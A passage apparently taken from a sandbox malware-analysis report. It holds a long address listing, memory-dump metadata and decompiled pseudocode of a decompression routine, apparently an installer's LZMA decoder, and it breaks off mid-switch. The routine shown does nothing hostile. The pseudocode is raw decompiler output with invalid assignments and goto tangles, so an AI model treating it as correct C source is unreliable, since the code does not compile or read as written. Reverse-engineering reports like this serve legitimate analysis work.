                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040647d
                                                                                    0x00406481
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406487
                                                                                    0x0040648b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406491
                                                                                    0x00406493
                                                                                    0x00406497
                                                                                    0x00406497
                                                                                    0x0040649a
                                                                                    0x0040649e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064ee
                                                                                    0x004064f2
                                                                                    0x004064f9
                                                                                    0x004064fc
                                                                                    0x004064ff
                                                                                    0x00406509
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x004064f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406515
                                                                                    0x00406519
                                                                                    0x00406520
                                                                                    0x00406523
                                                                                    0x00406526
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x00406529
                                                                                    0x0040652c
                                                                                    0x0040652f
                                                                                    0x0040652f
                                                                                    0x00406532
                                                                                    0x00406535
                                                                                    0x00406538
                                                                                    0x00406538
                                                                                    0x0040653b
                                                                                    0x00406542
                                                                                    0x00406547
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004065d5
                                                                                    0x004065d5
                                                                                    0x004065d9
                                                                                    0x00406977
                                                                                    0x00000000
                                                                                    0x00406977
                                                                                    0x004065df
                                                                                    0x004065e2
                                                                                    0x004065e5
                                                                                    0x004065e9
                                                                                    0x004065ec
                                                                                    0x004065f2
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f7
                                                                                    0x004065fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061ca
                                                                                    0x004061ca
                                                                                    0x004061ce
                                                                                    0x0040693b
                                                                                    0x00000000
                                                                                    0x0040693b
                                                                                    0x004061d4
                                                                                    0x004061d7
                                                                                    0x004061da
                                                                                    0x004061de
                                                                                    0x004061e1
                                                                                    0x004061e7
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061ec
                                                                                    0x004061ef
                                                                                    0x004061ef
                                                                                    0x004061f2
                                                                                    0x004061f5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061fb
                                                                                    0x00406201
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406207
                                                                                    0x00406207
                                                                                    0x0040620b
                                                                                    0x0040620e
                                                                                    0x00406211
                                                                                    0x00406214
                                                                                    0x00406217
                                                                                    0x00406218
                                                                                    0x0040621b
                                                                                    0x0040621d
                                                                                    0x00406223
                                                                                    0x00406226
                                                                                    0x00406229
                                                                                    0x0040622c
                                                                                    0x0040622f
                                                                                    0x00406232
                                                                                    0x00406235
                                                                                    0x00406251
                                                                                    0x00406254
                                                                                    0x00406257
                                                                                    0x0040625a
                                                                                    0x00406261
                                                                                    0x00406265
                                                                                    0x00406267
                                                                                    0x0040626b
                                                                                    0x00406237
                                                                                    0x00406237
                                                                                    0x0040623b
                                                                                    0x00406243
                                                                                    0x00406248
                                                                                    0x0040624a
                                                                                    0x0040624c
                                                                                    0x0040624c
                                                                                    0x0040626e
                                                                                    0x00406275
                                                                                    0x00406278
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x00406283
                                                                                    0x00406283
                                                                                    0x00406287
                                                                                    0x00406947
                                                                                    0x00000000
                                                                                    0x00406947
                                                                                    0x0040628d
                                                                                    0x00406290
                                                                                    0x00406293
                                                                                    0x00406297
                                                                                    0x0040629a
                                                                                    0x004062a0
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a5
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062b0
                                                                                    0x004062b3
                                                                                    0x004062b6
                                                                                    0x004062b9
                                                                                    0x004062bc
                                                                                    0x004062bf
                                                                                    0x004062c2
                                                                                    0x004062c5
                                                                                    0x004062c8
                                                                                    0x004062cb
                                                                                    0x004062ce
                                                                                    0x004062e6
                                                                                    0x004062e9
                                                                                    0x004062ec
                                                                                    0x004062ef
                                                                                    0x004062ef
                                                                                    0x004062f2
                                                                                    0x004062f6
                                                                                    0x004062f8
                                                                                    0x004062d0
                                                                                    0x004062d0
                                                                                    0x004062d8
                                                                                    0x004062dd
                                                                                    0x004062df
                                                                                    0x004062e1
                                                                                    0x004062e1
                                                                                    0x004062fb
                                                                                    0x00406302
                                                                                    0x00406305
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00406305
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406347
                                                                                    0x00406347
                                                                                    0x0040634b
                                                                                    0x00406953
                                                                                    0x00000000
                                                                                    0x00406953
                                                                                    0x00406351
                                                                                    0x00406354
                                                                                    0x00406357
                                                                                    0x0040635b
                                                                                    0x0040635e
                                                                                    0x00406364
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406369
                                                                                    0x0040636c
                                                                                    0x0040636c
                                                                                    0x00406372
                                                                                    0x00406310
                                                                                    0x00406310
                                                                                    0x00406313
                                                                                    0x00000000
                                                                                    0x00406313
                                                                                    0x00406374
                                                                                    0x00406374
                                                                                    0x00406377
                                                                                    0x0040637a
                                                                                    0x0040637d
                                                                                    0x00406380
                                                                                    0x00406383
                                                                                    0x00406386
                                                                                    0x00406389
                                                                                    0x0040638c
                                                                                    0x0040638f
                                                                                    0x00406392
                                                                                    0x004063aa
                                                                                    0x004063ad
                                                                                    0x004063b0
                                                                                    0x004063b3
                                                                                    0x004063b3
                                                                                    0x004063b6
                                                                                    0x004063ba
                                                                                    0x004063bc
                                                                                    0x00406394
                                                                                    0x00406394
                                                                                    0x0040639c
                                                                                    0x004063a1
                                                                                    0x004063a3
                                                                                    0x004063a5
                                                                                    0x004063a5
                                                                                    0x004063bf
                                                                                    0x004063c6
                                                                                    0x004063c9
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x00406658
                                                                                    0x00406658
                                                                                    0x0040665c
                                                                                    0x00406983
                                                                                    0x00000000
                                                                                    0x00406983
                                                                                    0x00406662
                                                                                    0x00406665
                                                                                    0x00406668
                                                                                    0x0040666c
                                                                                    0x0040666f
                                                                                    0x00406675
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x0040667a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406428
                                                                                    0x00406428
                                                                                    0x0040642b
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x00406767
                                                                                    0x0040676b
                                                                                    0x0040678d
                                                                                    0x00406790
                                                                                    0x0040679a
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040676d
                                                                                    0x00406770
                                                                                    0x00406774
                                                                                    0x00406777
                                                                                    0x00406777
                                                                                    0x0040677a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406824
                                                                                    0x00406828
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x0040684d
                                                                                    0x00406854
                                                                                    0x0040685b
                                                                                    0x0040685b
                                                                                    0x00000000
                                                                                    0x0040685b
                                                                                    0x0040682a
                                                                                    0x0040682d
                                                                                    0x00406830
                                                                                    0x00406833
                                                                                    0x0040683a
                                                                                    0x0040677e
                                                                                    0x0040677e
                                                                                    0x00406781
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406915
                                                                                    0x00406918
                                                                                    0x00406819
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040654f
                                                                                    0x00406551
                                                                                    0x00406558
                                                                                    0x00406559
                                                                                    0x0040655b
                                                                                    0x0040655e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406566
                                                                                    0x00406569
                                                                                    0x0040656c
                                                                                    0x0040656e
                                                                                    0x00406570
                                                                                    0x00406570
                                                                                    0x00406571
                                                                                    0x00406574
                                                                                    0x0040657b
                                                                                    0x0040657e
                                                                                    0x0040658c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406862
                                                                                    0x00406862
                                                                                    0x00406865
                                                                                    0x0040686c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406871
                                                                                    0x00406871
                                                                                    0x00406875
                                                                                    0x004069ad
                                                                                    0x00000000
                                                                                    0x004069ad
                                                                                    0x0040687b
                                                                                    0x0040687e
                                                                                    0x00406881
                                                                                    0x00406885
                                                                                    0x00406888
                                                                                    0x0040688e
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406893
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406899
                                                                                    0x00406899
                                                                                    0x0040689d
                                                                                    0x004068fd
                                                                                    0x00406900
                                                                                    0x00406905
                                                                                    0x00406906
                                                                                    0x00406908
                                                                                    0x0040690a
                                                                                    0x0040690d
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00000000
                                                                                    0x0040681f
                                                                                    0x00406819
                                                                                    0x0040689f
                                                                                    0x004068a5
                                                                                    0x004068a8
                                                                                    0x004068ab
                                                                                    0x004068ae
                                                                                    0x004068b1
                                                                                    0x004068b4
                                                                                    0x004068b7
                                                                                    0x004068ba
                                                                                    0x004068bd
                                                                                    0x004068c0
                                                                                    0x004068d9
                                                                                    0x004068dc
                                                                                    0x004068df
                                                                                    0x004068e2
                                                                                    0x004068e6
                                                                                    0x004068e8
                                                                                    0x004068e8
                                                                                    0x004068e9
                                                                                    0x004068ec
                                                                                    0x004068c2
                                                                                    0x004068c2
                                                                                    0x004068ca
                                                                                    0x004068cf
                                                                                    0x004068d1
                                                                                    0x004068d4
                                                                                    0x004068d4
                                                                                    0x004068ef
                                                                                    0x004068f6
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x00406594
                                                                                    0x00406597
                                                                                    0x004065cd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x00406700
                                                                                    0x00406700
                                                                                    0x00406703
                                                                                    0x00406705
                                                                                    0x0040698f
                                                                                    0x00000000
                                                                                    0x0040698f
                                                                                    0x0040670b
                                                                                    0x0040670e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406714
                                                                                    0x00406718
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x00000000
                                                                                    0x0040671b
                                                                                    0x00406599
                                                                                    0x0040659b
                                                                                    0x0040659d
                                                                                    0x0040659f
                                                                                    0x004065a2
                                                                                    0x004065a3
                                                                                    0x004065a5
                                                                                    0x004065a7
                                                                                    0x004065aa
                                                                                    0x004065ad
                                                                                    0x004065c3
                                                                                    0x004065c8
                                                                                    0x00406600
                                                                                    0x00406600
                                                                                    0x00406604
                                                                                    0x00406630
                                                                                    0x00406632
                                                                                    0x00406639
                                                                                    0x0040663c
                                                                                    0x0040663f
                                                                                    0x0040663f
                                                                                    0x00406644
                                                                                    0x00406644
                                                                                    0x00406646
                                                                                    0x00406649
                                                                                    0x00406650
                                                                                    0x00406653
                                                                                    0x00406680
                                                                                    0x00406680
                                                                                    0x00406683
                                                                                    0x00406686
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x00000000
                                                                                    0x004066fa
                                                                                    0x00406688
                                                                                    0x0040668e
                                                                                    0x00406691
                                                                                    0x00406694
                                                                                    0x00406697
                                                                                    0x0040669a
                                                                                    0x0040669d
                                                                                    0x004066a0
                                                                                    0x004066a3
                                                                                    0x004066a6
                                                                                    0x004066a9
                                                                                    0x004066c2
                                                                                    0x004066c4
                                                                                    0x004066c7
                                                                                    0x004066c8
                                                                                    0x004066cb
                                                                                    0x004066cd
                                                                                    0x004066d0
                                                                                    0x004066d2
                                                                                    0x004066d4
                                                                                    0x004066d7
                                                                                    0x004066d9
                                                                                    0x004066dc
                                                                                    0x004066e0
                                                                                    0x004066e2
                                                                                    0x004066e2
                                                                                    0x004066e3
                                                                                    0x004066e6
                                                                                    0x004066e9
                                                                                    0x004066ab
                                                                                    0x004066ab
                                                                                    0x004066b3
                                                                                    0x004066b8
                                                                                    0x004066ba
                                                                                    0x004066bd
                                                                                    0x004066bd
                                                                                    0x004066ec
                                                                                    0x004066f3
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x004066f3
                                                                                    0x00406606
                                                                                    0x00406609
                                                                                    0x0040660b
                                                                                    0x0040660e
                                                                                    0x00406611
                                                                                    0x00406614
                                                                                    0x00406616
                                                                                    0x00406619
                                                                                    0x0040661c
                                                                                    0x0040661c
                                                                                    0x0040661f
                                                                                    0x0040661f
                                                                                    0x00406622
                                                                                    0x00406629
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00406629
                                                                                    0x004065af
                                                                                    0x004065b2
                                                                                    0x004065b4
                                                                                    0x004065b7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406316
                                                                                    0x00406316
                                                                                    0x0040631a
                                                                                    0x0040695f
                                                                                    0x00000000
                                                                                    0x0040695f
                                                                                    0x00406320
                                                                                    0x00406323
                                                                                    0x00406326
                                                                                    0x00406329
                                                                                    0x0040632c
                                                                                    0x0040632f
                                                                                    0x00406332
                                                                                    0x00406334
                                                                                    0x00406337
                                                                                    0x0040633a
                                                                                    0x0040633d
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064a1
                                                                                    0x004064a1
                                                                                    0x004064a5
                                                                                    0x0040696b
                                                                                    0x00000000
                                                                                    0x0040696b
                                                                                    0x004064ab
                                                                                    0x004064ae
                                                                                    0x004064b1
                                                                                    0x004064b4
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b9
                                                                                    0x004064bc
                                                                                    0x004064bf
                                                                                    0x004064c2
                                                                                    0x004064c5
                                                                                    0x004064c8
                                                                                    0x004064c9
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064ce
                                                                                    0x004064d1
                                                                                    0x004064d4
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064da
                                                                                    0x004064dc
                                                                                    0x004064dc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x00406722
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406728
                                                                                    0x0040672b
                                                                                    0x0040672e
                                                                                    0x00406731
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406736
                                                                                    0x00406739
                                                                                    0x0040673c
                                                                                    0x0040673f
                                                                                    0x00406742
                                                                                    0x00406745
                                                                                    0x00406746
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x0040674b
                                                                                    0x0040674e
                                                                                    0x00406751
                                                                                    0x00406754
                                                                                    0x00406757
                                                                                    0x0040675b
                                                                                    0x0040675d
                                                                                    0x00406760
                                                                                    0x00000000
                                                                                    0x00406762
                                                                                    0x004064df
                                                                                    0x004064df
                                                                                    0x00000000
                                                                                    0x004064df
                                                                                    0x00406760
                                                                                    0x00406995
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x004069cc
                                                                                    0x004069cc
                                                                                    0x00000000
                                                                                    0x004069cc
                                                                                    0x00406819
                                                                                    0x004067a0
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x004063d4

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                    • Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
                                                                                    • Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                    • Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
